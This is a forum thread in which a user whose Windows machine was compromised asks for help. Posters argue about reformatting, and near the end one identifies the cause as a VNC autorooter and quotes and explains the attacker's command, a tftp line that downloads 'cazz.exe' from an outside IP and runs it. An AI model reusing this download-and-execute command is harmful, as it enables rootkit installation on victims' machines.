men...i you macchine have been compromised...now it could still be there with another name...
if you read some...meny experts recomend format after been "compromised" because you may ever know what else happen to your machine!
sorry for my english.
Maybe TFTP works in linux, not windows? I dont have my box in front of me at the moment.
EDIT: Ooops, nope TFTP works on my XP box. FORMAT or talk to streaker, he's got some pointers on cleaning boxes
I felt like bending the bars back, and ripping out the window frames and eating them. yes, eating them! Leaping, leaping, leaping! Colonics for everyone! All right! You dumb*sses. I'm a mental patient. I'm *supposed* to act out!
men...i you macchine have been compromised...now it could still be there with another name...
if you read some...meny experts recomend format after been "compromised" because you may ever know what else happen to your machine!
sorry for my english.
I scoff at such 'experts'.Originally Posted by demente
I just wrote a thread the other day with pretty much all the information you need to clean up our machine without reformatting it.
It's under the General Information section.
A third party security audit is the IT equivalent of a colonoscopy. It's long, intrusive, very uncomfortable, and when it's done, you'll have seen things you really didn't want to see, and you'll never forget that you've had one.
ill take a look. i know it can be done and i really loathe formatting lol.
thats weird...when i type in tftp in the command prompt i get "command cannot be found" are you sure you didnt install anything extra?Maybe TFTP works in linux, not windows? I dont have my box in front of me at the moment.
EDIT: Ooops, nope TFTP works on my XP box. FORMAT or talk to streaker, he's got some pointers on cleaning boxes
edit: wow, thats bizzar. i dont know if its because im running 64bit or what, but tftp is not found as a command on my desktop. i dont know why the attacker would disable or uninstall it...also, when these commands were run, they all failed. there were 12 command prompt windows and they all said "tftp is not a recognized command"
Positive........
I felt like bending the bars back, and ripping out the window frames and eating them. yes, eating them! Leaping, leaping, leaping! Colonics for everyone! All right! You dumb*sses. I'm a mental patient. I'm *supposed* to act out!
I'll scoff at them with you streaker !
To the ats1080 here is the guide:
http://forums.remote-exploit.org/showthread.php?t=13110
To be successful here you should read all of the following.
ForumRules
ForumFAQ
If you are new to Back|Track
Back|Track Wiki
Failure to do so will probably get your threads deleted or worse.
Actually, a funny trick I learned...
If you have to format someone's drive, Keep the Wallpaper and put it back after the reformat (if this is a picture of their kids or whatever). This almost "tricks" them into believing it was their old machine. I know it sounds lame, but it works and they feel happy. Even if they have to start reinstalling programs, they think it's "their old machine" just cleaned up.
But around here we dont have time to dabble into machines, we transfer their shizzola to a good working freshly reimaged one and pick apart the old one on the backend (if it's hardware) software gets the reimage of doom.
I felt like bending the bars back, and ripping out the window frames and eating them. yes, eating them! Leaping, leaping, leaping! Colonics for everyone! All right! You dumb*sses. I'm a mental patient. I'm *supposed* to act out!
its my computer, so it doesnt really matter about the format. i just hate reinstalling apps lol. but did anyone ever figure out what that command is?
vnc autorooter, old but still going around..
it sends keys to a vulnerable vnc server and installs the backdoor..
%comspec% takes you to system32 folder
/c echo Repairing user32.dll tries to make the program look legit
tftp -i 201.252.11.200 GET cazz.exe & start cazz&
well that connects via tftp to the IP and gets the rootkit "cazz.exe" and starts it.
Maybes try "tftp.exe" in the CMD/Dos window ?
As for a free VPN, have a look around :
h***s://secure.logmein.com/products/hamachi/vpn.asp?lang=en
NOTE the "s" ^^^ as in secure
Posting Permissions